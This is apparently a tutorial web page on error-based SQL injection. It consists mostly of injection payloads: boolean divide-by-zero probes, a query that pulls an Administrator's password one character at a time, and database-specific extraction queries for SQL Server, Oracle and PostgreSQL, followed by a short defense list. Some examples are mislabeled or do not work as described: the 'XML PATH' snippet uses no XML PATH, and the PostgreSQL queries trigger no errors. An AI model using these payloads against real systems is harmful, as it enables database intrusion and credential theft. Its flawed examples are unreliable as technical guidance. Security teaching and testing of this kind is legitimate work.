Skip to content
Ultimate Degree

Error-Based SQL Injection

Error-based SQL Injection exploits database error messages to extract data or infer information, even in blind scenarios. This technique relies on carefully crafted queries that generate informative error messages.

Exploitation Methods

1. Conditional Error Triggering

Force database errors based on boolean conditions to extract information. The application’s different responses to errors reveal data.

-- No error if condition is false
xyz' AND (SELECT CASE
    WHEN (1=2) THEN 1/0
    ELSE 'a'
END)='a
-- Triggers error if condition is true
xyz' AND (SELECT CASE
    WHEN (1=1) THEN 1/0
    ELSE 'a'
END)='a

Example Attack

-- Extract password character by character
xyz' AND (SELECT CASE
    WHEN (Username = 'Administrator'
        AND SUBSTRING(Password, 1, 1) > 'm')
    THEN 1/0
    ELSE 'a'
END FROM Users)='a

2. Verbose Error Message Exploitation

Identifying Injectable Parameters

Example error message revealing query structure:

Unterminated string literal started at position 52 in SQL
SELECT * FROM tracking WHERE id = '''. Expected char

Data Type Conversion Errors

-- Force type conversion error to reveal data
CAST((SELECT username FROM users) AS int)


-- Example error output:
ERROR: invalid input syntax for type integer: "admin_user"

Advanced Techniques

1. Error Stacking

-- Multiple conditions in single query
xyz' AND (SELECT CASE
    WHEN (condition1) THEN 1/0
    WHEN (condition2) THEN 2/0
    ELSE 'a'
END)='a

2. Database-Specific Techniques

Microsoft SQL Server

-- Using convert()
AND 1=CONVERT(int, (SELECT top 1 username FROM users))


-- Using XML PATH
AND 1=1/(SELECT TOP 1 CASE WHEN (1=1) THEN 1/0 ELSE 1 END FROM users)

Oracle

-- Using CTXSYS.DRITHSX.SN
SELECT CTXSYS.DRITHSX.SN(user, (SELECT password FROM users))


-- Using XMLType
SELECT XMLType('<?xml version="1.0"?><root>' ||
    (SELECT password FROM users) || '</root>')

PostgreSQL

-- Using encode()
SELECT encode((SELECT password FROM users), 'base64')


-- Using string concatenation
SELECT 'data:' || (SELECT password FROM users)

Defense Strategies

  1. Stop verbose error reporting
  2. Implement proper error handling
  3. Review application logs
  4. Patch vulnerable code
  5. Update security controls